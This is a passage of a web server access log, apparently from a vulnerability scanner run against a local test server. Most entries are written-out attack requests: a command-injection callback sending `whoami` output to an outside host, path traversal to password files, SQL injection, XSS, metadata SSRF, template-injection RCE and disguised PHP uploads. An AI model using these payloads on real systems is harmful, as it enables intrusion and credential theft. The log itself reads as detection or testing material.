`whoami`.ca2tuc8smpv1g2s80ca0mkfg7cu1bsp6u.oast.pro} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"proId=1'&addToCart=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /action.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/backend/auth/signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.310","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(29N5EfPnds8Rtil9qiofnFHPH19)%3c%2fscript%3e&win=2707 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x2229N5EjjqQixysElkvNj908Sm3k4.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D=29N5EiXVEUzRFjHPXKGV84Mq8aG&settings%5Burl%5D=%2F29N5EiXVEUzRFjHPXKGV84Mq8aG&fileName=29N5EiXVEUzRFjHPXKGV84Mq8aG&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-----------------------------253855577425106594691130420583\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22../../../../../tmp/passwd9\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0AMyPasswdNewData->/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&search=&type=page","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php 